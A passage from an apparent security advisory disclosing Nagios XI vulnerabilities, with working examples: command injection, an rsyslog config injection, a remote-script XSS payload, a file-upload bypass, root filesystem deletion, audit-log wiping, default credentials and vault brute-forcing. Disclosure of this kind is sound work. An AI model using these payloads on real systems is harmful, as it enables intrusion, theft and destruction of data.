Because this webshell does not require the user to be authenticated with Nagios XI, an attacker on the same network as the Nagios XI server can begin fuzzing the webshell in an attempt to gain unauthenticated code execution on the host.
Ultimately, the use of a no-longer-maintained, heavily outdated webshell such as `shellinabox` introduces risk to every installation of Nagios XI. This risk is compounded by the lack of any requirement for the user to be logged into Nagios XI.
3. Command Injection in Host Configuration Page (CVE-2023-47408)
Risk: High (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:L/A:L)
Impact
Nagios XI takes care to ensure that administrators cannot obtain direct shell access on the Nagios XI server without first having valid credentials for the host.
Exploitation of this finding would allow an administrator to gain command execution on the host, which would enable them to begin the process of exploiting all agents connected to the server.
Details
Administrators can define ‘services’ within Nagios XI. These ‘services’ are essentially a set of scripts that the server executes to check if a particular service or process on an agent is operating correctly.
Administrators select from a drop-down list of scripts, and can then supply arbitrary arguments to the script, often including a $HOSTNAME parameter indicating which host the script should be executed against.
The image above shows the service management page, complete with unfilled argument templates.
Administrators enter values in the `$ARG1$` and `$ARG2$` input boxes, which are placed into the command when it is executed as part of scheduled/forced checks against a host.
During this vulnerability research it was observed that administrators can perform a command injection attack on the Nagios server by entering commands surrounded by backticks within the argument input boxes.
For example, taking the `check_xi_host_http` script –
The command injection payload within `$ARG1$` results in a new file being created in `/tmp/test1` containing the current date/time whenever the service check executes.
$~ cat /tmp/test1
cat: /tmp/test1: No such file or directory
$~ cat /tmp/test1
Mon 14 Aug 2023 06:16:06 AM EDT
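The root cause, unsafe substitution of `$ARGn$` values into a shell command, can be sketched as follows (the command template is illustrative, not the actual Nagios plugin invocation):

```python
import subprocess

# Illustrative command template; Nagios substitutes $ARGn$ values verbatim.
template = "echo checking host -H $HOSTNAME$ -u $ARG1$"
user_args = {"$HOSTNAME$": "localhost", "$ARG1$": "`id -un`"}

cmd = template
for placeholder, value in user_args.items():
    cmd = cmd.replace(placeholder, value)  # no escaping or validation

# When the composed string reaches a shell, the backticks are evaluated
# as command substitution before the outer command runs.
result = subprocess.run(["sh", "-c", cmd], capture_output=True, text=True)
print(result.stdout)
```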
This flaw could be abused to create a reverse shell connection to an attacker’s machine, enabling them to fully compromise the Nagios XI server.
4. Remote Code Execution Via Custom Includes (CVE-2023-47400)
Risk: High (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:L/A:L)
Impact
Consequences of this RCE include complete host compromise, complete database compromise, and compromise of all agents with SSH keys registered with Nagios XI.
Numerous controls have been implemented which attempt to prevent users from uploading PHP files, indicating that this is a risk that Nagios developers acknowledge and are keen to avoid. These controls are –
A `.htaccess` file which explicitly prevents PHP code from executing and forcibly sets the Content-Disposition to 'attachment', which prevents files from rendering; they are instead downloaded upon access.
A requirement for image files to begin with valid image ‘magic bytes’.
A requirement for all uploaded filenames to contain an expected file extension (.css, .jpg, .js, etc.)
After uploading files, the application allows developers to rename uploaded files using a rename utility built into the Custom Includes page.
NCC Group researchers were able to bypass each of the above restrictions using the following steps –
Upload a valid image named “test.jpg”
Use the rename feature of Custom Includes to rename the image to “.htaccess” (which has the effect of overwriting the existing `.htaccess` file)
Rename the file to “test.jpg” again, resulting in there being no `.htaccess` file present
Upload a file named “exploit.jpg.php” with the following contents –
A simple phpinfo() payload is displayed here as a proof of concept, however this could have been any malicious PHP code to compromise the host.
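A minimal sketch of such an upload payload, assuming the magic-byte check looks for standard JPEG header bytes (the exact bytes checked by the filter are an assumption):

```python
import os
import tempfile

# Sketch of an image/PHP polyglot: valid JPEG magic bytes followed by PHP.
# The filename and phpinfo() payload follow the advisory; the specific
# bytes the upload filter checks are assumed to be the JPEG header.
path = os.path.join(tempfile.gettempdir(), "exploit.jpg.php")
jpeg_magic = b"\xff\xd8\xff\xe0"          # JPEG SOI + APP0 marker
php_payload = b"<?php phpinfo(); ?>"

with open(path, "wb") as f:
    f.write(jpeg_magic + b"\n" + php_payload)

data = open(path, "rb").read()
print(data[:4].hex(), b"<?php" in data)
```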
5. Any Authenticated User Can Manipulate User and System Macros (CVE-2023-47412)
Risk: Medium (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N)
Impact
Any authenticated user can steal credentials from user macros if the "Redacted Macros" setting is disabled, can modify existing user and system macros to provoke denial-of-service conditions (for macros which contain credentials to services), and can cause the server to leak useful/sensitive information to all authenticated users (via System Macros).
Details
User Macros
'User macros' is an application feature which allows administrators to store secrets in a configuration file, rather than hardcoding them in host commands and the like, for security purposes.
User macros can be set and viewed under `Configure -> Core Config Manager -> User Macros`. This is intended to be an administrator only feature, given that freshly created users have their ‘Core Config Manager’ setting disabled by default.
Low-privileged users can access these macros directly by navigating to “http://server_hostname/nagiosxi/includes/components/usermacros/index.php”. If “redacted macros” has been disabled in config, all the sensitive macros will be displayed to the user here.
The intended behaviour is that if "redacted macros" is enabled, an administrator cannot modify the User Macros: the text box is greyed out, the update button is disabled, and all fields are redacted. During this vulnerability research it was observed that even when `redacted macros` is enabled, and the User Macros file cannot be modified via the UI, any authenticated user can still modify the User Macros by simply sending an appropriately formatted HTTP request to the above URL, as shown below –
curl 'http://server_hostname/nagiosxi/includes/components/usermacros/?mode=overwrite&content=NCC%20GROUP' --compressed -X POST -H 'Cookie: nagiosxi=COOKIE_VALUE'
Resulting in the file being successfully truncated, with all prior secrets lost –
$~ cat /usr/local/nagios/etc/resource.cfg
NCC GROUP
$~
This attack was performed by a user who has had their ‘Core Config Manager Access’ field set to ‘None’ –
Any authenticated user can also exploit this flaw by using the `update` mode of operation, even when the config is not intended to be writable, via a GET request to the following URL: http://server_hostname/nagiosxi/includes/components/usermacros/index.php?mode=update&macro=NCC%20GROUP&new_value=53
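Either request can be scripted; a minimal sketch of the overwrite request using Python's standard library (hostname and cookie value are placeholders, mirroring the curl example above):

```python
from urllib.parse import urlencode
from urllib.request import Request

# Hostname and session cookie are placeholders.
url = "http://server_hostname/nagiosxi/includes/components/usermacros/"
body = urlencode({"mode": "overwrite", "content": "NCC GROUP"}).encode()
req = Request(url, data=body, method="POST",
              headers={"Cookie": "nagiosxi=COOKIE_VALUE"})

# urllib.request.urlopen(req) would submit the request; it is not called
# here because the host is a placeholder.
print(req.get_method(), req.full_url)
```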
System Macros
Additionally, via the same URL, any authenticated user can access and change the `System Macro` settings too. In this case, though, the Update button is present and available for any user to press.
Once again, this is intended to be a feature which is only exposed to privileged users.
6. Host Pivot Via Insecure Migration Process Ansible Vault Credentials (CVE-2023-47409)
Risk: Medium (CVSS:3.0/AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H)
Impact
An attacker who has successfully compromised and gained root on a Nagios XI server can retrieve privileged credentials for third party hosts from encrypted Ansible vault files.
Details
As part of Nagios XI installation, the installer adds the following line to `/etc/sudoers` –
The nagios user is allowed to execute the above script as root, to migrate the Nagios server to another server. The script accepts a hostname, a root or sudoer username and the corresponding password for that account. Those credentials are then placed into a YML file which is encrypted with an Ansible “vault password”.
The Ansible encrypted vault file is later used by `migrate.php` to migrate the Nagios server to a remote server using the Ansible application. These encrypted YML files are not deleted when the migration is completed.
Within `migrate.php` are the following lines of interest –
// O.B NCC => run_migration_ansible():83
$dir = get_root_dir() . '/scripts/migrate';
$job_name = uniqid();
// O.B NCC => vault_password is predictable; value is derived from the current time
$vault_password = uniqid();
$job_dir = $dir.'/jobs/'.$job_name;
$yml_file = file_get_contents($dir."/templates/migrate_core.yml");
// O.B NCC => SNIP
copy($dir.'/templates/ansible.cfg', $job_dir.'/ansible.cfg');
$job_file = $job_dir.'/'.$job_name.'.yml';
// O.B NCC => $job_file now contains the credentials
file_put_contents($job_file, $yml_file);
// Add hosts and password file
file_put_contents($job_dir.'/hosts', $address);
file_put_contents($job_dir.'/.vp', $vault_password);
// Make encrypted ansible playbook to protect passwords
$cmd = "echo -n '".$vault_password."' | ansible-vault encrypt --vault-password-file=".$job_dir.'/.vp'." ".$job_file." --output ".$job_file;
// O.B NCC => $job_file is now encrypted using the vault password. It is not deleted at the end of the migration process
The PHP `uniqid` function generates a 'unique identifier' from the current time: its output is a hexadecimal string comprising the current Unix timestamp in seconds (8 hex characters) concatenated with the current microseconds (5 hex characters).
The PHP documentation notes that “This function does not generate cryptographically secure values, and must not be used for cryptographic purposes, or purposes that require returned values to be unguessable.”
Taking `64cb047ea475b` as an example, when it is decoded to decimal the seconds portion is 1691026558 and the microseconds portion is 673627.
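This decomposition can be verified directly:

```python
# Decode the example uniqid() value from the text into its two components.
value = "64cb047ea475b"
seconds = int(value[:8], 16)   # Unix timestamp (8 hex characters)
micros = int(value[8:], 16)    # microseconds (5 hex characters)
print(seconds, micros)  # 1691026558 673627
```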
Because the $vault_password variable is created with the PHP `uniqid` function, it is trivial for an attacker who has compromised the local Linux root user account to obtain access to privileged credentials of a remote machine by doing the following –
Navigating to any job directory within `/usr/local/nagiosxi/scripts/migrate/jobs/`
Running `stat -t NAME_OF_JOB_FILE | cut -d" " -f 12` on the encrypted job file
Converting the timestamp from `stat` to hexadecimal
Brute-forcing Ansible vault decryption from TIMESTAMP_HEX00000 all the way to TIMESTAMP_HEXFFFFF
Or, for a neater example using the timestamp above: `64cb047e00000` to `64cb047eFFFFF`
Because most of the vault password is known (from the time that the vault was created), the key space to decrypt an impacted YML file is only 00000-FFFFF, i.e. at most 1,048,576 candidate passwords, and all guesses are performed entirely offline.
Given that only a few milliseconds pass between the file being created and the file being encrypted and given that the name of the job file is also derived using `uniqid()`, it is possible to guess the password within around 10 guesses simply by incrementing the last hex digit of the job’s filename.
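The candidate-generation step can be sketched as follows, assuming a job file named with the example `uniqid()` value above (each candidate would then be fed to `ansible-vault decrypt` as a vault password):

```python
# The vault password's uniqid() was generated microseconds after the job
# name's, so candidates are produced by incrementing from the filename
# (ignoring the rare rollover across a second boundary).
job_name = "64cb047ea475b"            # example/hypothetical job filename
ts_hex, micro_hex = job_name[:8], job_name[8:]

candidates = [ts_hex + format(int(micro_hex, 16) + i, "05x")
              for i in range(16)]     # a handful of guesses usually suffices
print(candidates[:3])
```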
A small proof of concept was written which abuses this flaw to retrieve remote root/sudoer credentials from job files –
Credentials for a remote host were successfully decrypted and extracted.
7. Local Privilege Escalation via rsyslog abuse (CVE-2023-47414)
Risk: Medium (CVSS:3.0/AV:L/AC:L/PR:H/UI:N/S:C/C:L/I:N/A:N)
Impact
Compromise of the syslog user allows an attacker to read all files under `/var/log`, amongst other directories. Access to these directories is heavily guarded due to the potential for secrets (credentials, session IDs, PII) to be present within log files.
Details
As part of its installation, Nagios XI adds the following line to `/etc/sudoers` –
NAGIOSXI ALL = NOPASSWD:/usr/bin/php /usr/local/nagiosxi/scripts/send_to_nls.php *
This line allows the local nagios user to execute `send_to_nls.php` as root with any number of arguments. The script dynamically generates a new rsyslog file using the following code –
$file_content = '
# Automatically generated by Nagios XI. Do not edit this file!
$ModLoad imfile
$InputFilePollInterval 10
$PrivDropToGroup adm
$WorkDirectory '.$spool_directory.'
# .... NCC O.B SNIPPED ....
$InputFilePersistStateInterval 20000
$InputRunFileMonitor
# Forward to Nagios Logserver and then discard.
if $programname == \'' . $tag . '\' then @@' . $hostname . ':' . $port . '
if $programname == \'' . $tag . '\' then ~';
file_put_contents($conf_file, $file_content);
finish();
function finish() {
//restart rsyslogd
$cmdline = "service rsyslog restart";
echo exec($cmdline, $out, $rc);
exit($rc);
}
In the forwarding rule above (the line ending `':' . $port`), the `$port` variable is not sanitized or validated as being an integer prior to being written to the rsyslog file. This lack of sanitization means that a local attacker can inject arbitrary content into new rsyslog files, gaining code execution as the syslog user. For example, consider the following use of `send_to_nls.php` –
sudo php /usr/local/nagiosxi/scripts/send_to_nls.php hostname "`printf '53\n\nmodule(omprog)\naction(type=\"omprog\" binary=\"/tmp/runsAsSyslog \")'`" tag file
Observe that instead of supplying an integer port argument, we have supplied `printf '53\n\nmodule(omprog)\naction(type=\"omprog\" binary=\"/tmp/runsAsSyslog \")'` wrapped in backticks, so the shell substitutes the printf output into the argument.
Executing this command creates a new rsyslog file with the following contents –
# Automatically generated by Nagios XI. Do not edit this file!
$ModLoad imfile
$InputFilePollInterval 10
$PrivDropToGroup adm
$WorkDirectory /var/spool/rsyslog
# Input for file
$InputFileName file
$InputFileTag tag:
$InputFileStateFile nls-state-64cb1a2feedb9 # Must be unique for each file being polled
# Uncomment the folowing line to override the default severity for messages
# from this file.
#$InputFileSeverity info
$InputFilePersistStateInterval 20000
$InputRunFileMonitor
# Forward to Nagios Logserver and then discard.
if $programname == 'tag' then @@hostname:53
module(omprog)
action(type="omprog" binary="/tmp/runsAsSyslog")
if $programname == 'tag' then ~
When this configuration is evaluated by rsyslog, the injected `omprog` action (the `module(omprog)`/`action(...)` lines above) will attempt to execute `/tmp/runsAsSyslog` as an executable file.
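The template injection can be reproduced in miniature; the following is a Python re-sketch of the vulnerable PHP concatenation, not the original code:

```python
# Re-sketch of the vulnerable concatenation from send_to_nls.php: the
# unvalidated $port value carries embedded newlines and extra directives.
tag, hostname = "tag", "hostname"
port = '53\n\nmodule(omprog)\naction(type="omprog" binary="/tmp/runsAsSyslog")'

conf = (f"if $programname == '{tag}' then @@{hostname}:{port}\n"
        f"if $programname == '{tag}' then ~\n")
print(conf)
```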
8. Recursive Filesystem Deletion as Root Via Backup Script (CVE-2023-47411)
Risk: Medium (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:N/I:H/A:N)
Impact
Recursive deletion of the server filesystem contents, meaning that all databases, all host details, all config, backups, and custom code/assets will be deleted.
Details
As part of Nagios XI installation, the installer adds the following line to `/etc/sudoers` –
NAGIOSXI ALL = NOPASSWD:/usr/local/nagiosxi/scripts/backup_xi.sh *
This line denotes that the `nagios` user is allowed to execute the `backup_xi.sh` script as root without supplying a password. The `*` suffix indicates that the script accepts any number of user-supplied arguments.
Whilst reading the script at `/usr/local/nagiosxi/scripts/backup_xi.sh` the following lines were observed:
###############################
# USAGE / HELP
###############################
usage () {
echo ""
echo "Use this script to backup Nagios XI."
echo ""
# .... NCC O.B SNIP ....
###############################
# ADDING LOGIC FOR NEW BACKUPS
###############################
while [ -n "$1" ]; do
case "$1" in
-h | --help)
usage
exit 0
;;
-n | --name)
# NCC O.B => attacker supplied fullname variable
fullname=$2
;;
-p | --prepend)
prepend=$2"."
;;
-a | --append)
append="."$2
;;
-d | --directory)
# NCC O.B => attacker supplied rootdir variable
rootdir=$2
;;
esac
shift
done
Both the `$rootdir` and `$fullname` variables are attacker controlled. Later in the script, the attacker-controlled variables are used as follows –
# NCC O.B => Check if $rootdir has a value
if [ -z "$rootdir" ]; then
rootdir="/store/backups/nagiosxi"
fi
# NCC O.B SNIP
# NCC O.B => $name is now attacker controlled
name=$fullname
# NCC O.B => Check if $fullname has a value
if [ -z "$fullname" ]; then
name="$prepend$ts$append"
fi
# Clean the name
# NCC O.B => Leave only periods, alphanumerics, pipes and hyphens in the name
name=$(echo "$name" | sed -e 's/[^[:alnum:].|-]//g')
# Get current Unix timestamp as name
if [ -z "$name" ]; then
name="$ts"
fi
# My working directory
# NCC O.B => now $mydir is a concatenation of the cleaned user supplied name and the unclean $rootdir
mydir=$rootdir/$name
Finally, after all of the backups are complete (regardless of success or failure), the following code executes –
##############################
# COMPRESS BACKUP
##############################
echo "Compressing backup..."
tar czfp "$name.tar.gz" "$name"
# NCC O.B => BUG HERE
rm -rf "$name"
# Change ownership
chown "$nagiosuser:$nagiosgroup" "$name.tar.gz"
if [ -s "$name.tar.gz" ];then
echo " "
echo "==============="
echo "BACKUP COMPLETE"
echo "==============="
echo "Backup stored in $rootdir/$name.tar.gz"
exit 0;
else
echo " "
echo "==============="
echo "BACKUP FAILED"
echo "==============="
echo "File was not created at $rootdir/$name.tar.gz"
# NCC O.B => BUG HERE
rm -r "$mydir"
exit 1;
fi
As noted above by the two `BUG HERE` labels, there are two key bugs present here, both stemming from the same root cause.
If an attacker supplies a `name` parameter of `.` (a single period, which survives the `sed` command that cleans the supplied filename) and a `rootdir` parameter of `/` (a single slash), then the script will execute `rm -rf .`, recursively removing all files and directories from the directory specified within the command downwards.
Because the attacker controls `$rootdir`, and the script starts by executing `cd $rootdir`, this line of code has the potential to delete the entire filesystem (directly equivalent to executing `rm -rf /`).
An attacker who has compromised the Nagios user could abuse this flaw to recursively remove all files from the filesystem post-compromise.
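The filename 'cleaning' step can be re-checked by re-implementing the `sed` expression (a sketch, assuming the character class shown in the script):

```python
import re

# Equivalent of: sed -e 's/[^[:alnum:].|-]//g'
def clean(name: str) -> str:
    return re.sub(r"[^A-Za-z0-9.|-]", "", name)

rootdir, name = "/", "."
assert clean(name) == "."          # a lone period survives the filter
mydir = f"{rootdir}/{name}"        # '//.': the attacker-chosen root
print(mydir, "-> rm -rf", clean(name))
```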
9. Stored Cross Site Scripting Vulnerability in Admin’s User Management Page (CVE-2023-47410)
Risk: Medium (CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:N/A:N)
Impact
Consequences of an exploited stored Cross-Site Scripting vulnerability generally range from site defacement to account takeover, CSRF, and sophisticated phishing attacks.
Details
During this vulnerability research it was observed that there is a lapse in output encoding in the admin-only user profile modification page at http://server_hostname/nagiosxi/admin/users.php?edit=1&user_id[]=4 (for example). Assume a malicious administrator creates a new user with a username containing a JavaScript payload, such as –
When another administrator attempts to view that user’s profile by clicking on their username in “http://nagios_server/nagiosxi/admin/users.php”, the JavaScript payload in the username will execute in the victim’s browser –
The root cause of this vulnerability has been traced to this inline JavaScript in the admin user management page –
$('.set-random-pass').click(function() {
var newpass = Array(16).fill("0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz").map(function(x) { return x[Math.floor(Math.random() * x.length)] }).join('');
$('input[name=password1]').val(newpass);
$('input[name=sendemail]').prop('disabled', false).prop('checked', true);
});
$('#updateForm').submit(function(e) {
// NCC C.B => Here
if (updateButtonClicked && $('#usernameBox').val() != "nagios3");</script><script src="https://nc.ci/1.js"></script>") {
var go_ahead_and_change = confirm("Changing your username is not recommended. But if you wish to proceed, you should be warned that it may take a while to take effect depending on your configuration. Do you wish to proceed?");
if (!go_ahead_and_change) {
e.preventDefault();
}
}
});
});
</script>
Essentially, the user's username is concatenated unsafely into the inline JavaScript by `users.php`, resulting in the potential for JavaScript execution.
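A simplified sketch of the unsafe concatenation (the page template and `confirmChange` helper are hypothetical; the breakout payload mirrors the one above):

```python
# Hypothetical, simplified version of the inline-script construction in
# users.php: the raw username is concatenated in with no output encoding.
username = 'nagios3");</script><script src="https://nc.ci/1.js"></script>'
page = ('<script>if (updateButtonClicked && $("#usernameBox").val() != "'
        + username + '") { confirmChange(); }</script>')

# The quote and ");" terminate the string and statement, and the closing
# </script> tag lets the attacker open a fresh, attacker-controlled script.
print('<script src="https://nc.ci/1.js">' in page)
```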
10. Unintended Files Can Be Edited by Graph Editor Page (CVE-2023-47413)
Risk: Medium (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:L/A:L)
Impact
An attacker with administrator privileges can modify PHP files to execute arbitrary code on the host and maintain access for future exploitation.
Details
When the edit button is selected in the UI, the URL changes to, for example, http://server_hostname/nagiosxi/admin/graphtemplates.php?edit=check_local_disk.php&dir=templates, which allows a user to edit the file /usr/local/nagios/share/pnp/templates/check_local_disk.php.
While there are impressively robust controls in place to prevent path traversal attacks outside of “/usr/local/nagios/share/pnp/”, NCC Group researchers observed that, by supplying a `dir` parameter of either `/` or `..` (which the Nagios server replaces with `/`), it was possible to edit other PHP files within the parent directory.
Specifically, it is possible to edit the following files in the “/usr/local/nagios/share/php/” directory –
index.php
ajax.php
zoom.php
Because these files are not listed within the graph template list in the UI, it is assumed that they are not intended to be editable by administrators.
11. Missing Objects Page Accessible To Low-Privileged Users
Impact
A low-privileged (non-admin) user can abuse this page to change CCM settings, clear the `Missing Objects` list, and apply configuration (causing a new snapshot to be generated).
Details
One of the many Nagios XI features available to administrators is the “Missing Objects” page at `/nagiosxi/admin/missingobjects.php`.
According to the page, it allows admins to –
[..] delete unneeded host and services or add them to your monitoring configuration through this page. Note that a large amount of persistent unused passive checks can result in a performance decrease.
As part of the operation of this page, it is possible to ‘apply’ changes which has the result of generating a new configuration snapshot on disk.
During this vulnerability research it was observed that this page and all its features are available to all authenticated users, regardless of whether they are administrators or not.
Allowing non-admin users to access this page increases the risk of an attacker making harmful configuration changes, deleting or manipulating Missing Object records, and creating arbitrary numbers of configuration snapshots until the snapshot disk/partition is filled.
12. Nagios XI Database User Can Delete From Audit Log (CVE-2023-47399)
Impact
The ability to clear the audit log table after a successful compromise will make it significantly more difficult for an administrator or Incident Response team to establish how the initial compromise occurred and fix the flaw.
Details
The `nagiosxi.xi_auditlog` table is a granular source of information about a user’s activities within the Nagios XI web application.
Allowing the `nagiosxi` database user to have full CRUD control over the audit logs makes it significantly easier for an attacker to successfully mask their activities after a successful host compromise via the web application.
Malicious activities could be trivially obscured using simple MySQL queries such as `update xi_auditlog set message="" where auditlog_id>94;`
Removing the `nagiosxi` user’s ability to update/delete records in this table is beneficial as, in the event of a compromise, this audit log may help IR teams to identify how the application was compromised.
13. Plaintext Storage of NRDP and NSCA Tokens (CVE-2023-47402)
Impact
An attacker who has compromised the database gains the ability to submit data to remote Nagios instances, and potentially to submit malformed/malicious payloads to the compromised Nagios instance.
Details
Nagios XI offers an admin-only feature to configure "Inbound Transfer" and "Outbound Transfer" settings. These settings allow the administrator to supply data such as credentials, protocols, or IP addresses for third-party Nagios NRDP/NSCA servers, and to configure an authorization token for third parties to supply data to the local Nagios server.
While enumerating Nagios’s `nagiosxi` database, NCC Group researchers observed that each of the credentials supplied in Inbound/Outbound Transfer settings were stored in the `xi_options` database table in plaintext, as shown below.
14. Localhost Port Scanning Via Scheduled Backup Connection Test
Impact
Attackers can abuse this kind of port-scanning attack to determine whether services are listening on interesting ports. Attackers can then leverage this information to, for example, abuse other features of the application (such as the numerous Nagios API monitoring plugins) to submit arbitrary traffic to these ports on localhost. The ability to determine whether a port is open and submit traffic to it can often allow an attacker to submit known exploit proof-of-concept scripts to the services for code execution.
Details
The `System Backups -> Scheduled Backups` feature of Nagios XI allows administrators to test whether they are able to successfully connect to an FTP server. The feature allows admin users to supply both a server hostname/IP and a TCP port.
During this research it was observed that if an attacker supplies a server IP of 127.0.0.1 (localhost) and a random port which is open/listening, the application would take a couple of seconds to reply that it failed to connect. However, if an attacker supplies a port parameter for a port which is not listening on localhost, the application would return the same error almost instantaneously.
This discrepancy in error message timings when the port is closed versus when the port is open allows an attacker to perform a port scan against the server and obtain information about which ports are listening on localhost. As noted above, by itself this is not a particularly severe flaw, however it forms a key part of an attacker’s ability to fully enumerate the webserver and formulate a plan for compromising it.
NCC Group consultants were also able to abuse this feature to portscan internal IP addresses of other machines on the network, too.
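The oracle can be sketched as a simple classifier over observed response delays (the threshold and timings below are illustrative, not real measurements):

```python
# Sketch of the timing oracle: the "test connection" endpoint responds
# slowly when the target port is open/listening and near-instantly when
# it is closed. Threshold and observations are illustrative values.
SLOW_REPLY_SECONDS = 1.0

def port_state(elapsed: float) -> str:
    """Classify a port from the observed response delay in seconds."""
    return "open" if elapsed >= SLOW_REPLY_SECONDS else "closed"

observed = {22: 2.1, 80: 0.05, 3306: 1.9, 8080: 0.04}  # port -> seconds
open_ports = sorted(p for p, t in observed.items() if port_state(t) == "open")
print(open_ports)  # [22, 3306]
```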
15. Sensitive Credentials Stored in Plaintext World Readable Files (CVE-2023-47407)
Amongst other secrets, the affected configuration file contains basic authentication credentials for various subsystems.
During this research it was observed that this file is 'world readable', meaning that any user on the machine is able to read its contents without needing to be part of any specific user group. Given the sensitivity of the file, it must be strictly protected in order to prevent a low-privileged attacker on a compromised webserver from gaining access to the database and the ability to pivot to additional hosts.
Additionally, it was observed that the `htpasswd` file under `/usr/local/nagiosxi/etc/htpasswd.users` is also world readable. This file contains the SHA1 hashed credentials for every Nagios XI user –
Should attackers compromise the webserver or obtain the ability to read arbitrary files on the webserver, they will be able to read the contents of this file and mount an offline brute-force attack on the hashes in an attempt to obtain the associated plaintext passwords.
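Checking for the world-readable bit is straightforward; a sketch using a scratch file (on a live system the paths to check would be the Nagios XI configuration file and `/usr/local/nagiosxi/etc/htpasswd.users`):

```python
import os
import stat
import tempfile

def world_readable(path: str) -> bool:
    """True if the 'other' read bit is set on the file."""
    return bool(os.stat(path).st_mode & stat.S_IROTH)

# Demonstrate on a scratch file rather than the real Nagios XI paths.
with tempfile.NamedTemporaryFile(delete=False) as f:
    path = f.name
os.chmod(path, 0o644)
print(world_readable(path))   # readable by any local user
os.chmod(path, 0o640)
print(world_readable(path))   # owner/group only
os.remove(path)
```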
16. Weak Default MySQL Credentials (CVE-2023-47405)
Impact
Consequences of highly privileged access to the MySQL server include code execution, Nagios agent compromise, and Nagios server denial of service.
Details
As part of this vulnerability research, a fresh Ubuntu 22 virtual machine was created with no additional configuration performed.
During the installation of Nagios XI, it was observed that the installer creates at least 3 MySQL database users with weak credentials –
`nagiosxi`/`n@gweb`
`nagiosql`/`n@gweb`
`ndoutils`/`n@gweb`
Each of these users has full Create/Read/Update/Delete (CRUD) access to their respective databases, which allows for trivial admin account takeover, denial of service (by deleting config data, user data or network host data), and potentially code execution (for example by modifying the entries within the `nagiosql.tbl_command` table).
The risk of this finding is mitigated significantly because, in the default configuration, the MySQL database server only listens on localhost. However, if the webserver is compromised (as evidenced by the technical advisories in this research piece), these weak credentials make it trivial for an attacker to compromise the database.
Disclosure Timeline
9/19/2023 – Initial contact made with the vendor in order to establish a secure channel to share the vulnerability details
9/19/2023 – Nagios Enterprises, LLC responds indicating that we can email the disclosures to them
9/19/2023 – NCC Group consultants send the disclosures by email
9/19/2023 – Nagios Enterprises, LLC confirm receipt of the vulnerabilities
9/20/2023 – Nagios Enterprises, LLC schedules a call to discuss the vulnerabilities
9/21/2023 – Nagios Enterprises, LLC request clarification on a finding
9/21/2023 – NCC Group responds with the clarification
10/17/2023 – Nagios Enterprises, LLC reschedules the vulnerability discussion call to November 1st
11/1/2023 – NCC Group and Nagios Enterprises, LLC have a call to discuss the findings and remediation progress. Rough coordinated disclosure date established for early December
12/5/2023 – NCC Group requests a status update for when the fix is due to be released, in order to coordinate public disclosure
12/8/2023 – Nagios responds to confirm that they consider the vulnerabilities to be mitigated, and we can proceed with public disclosure.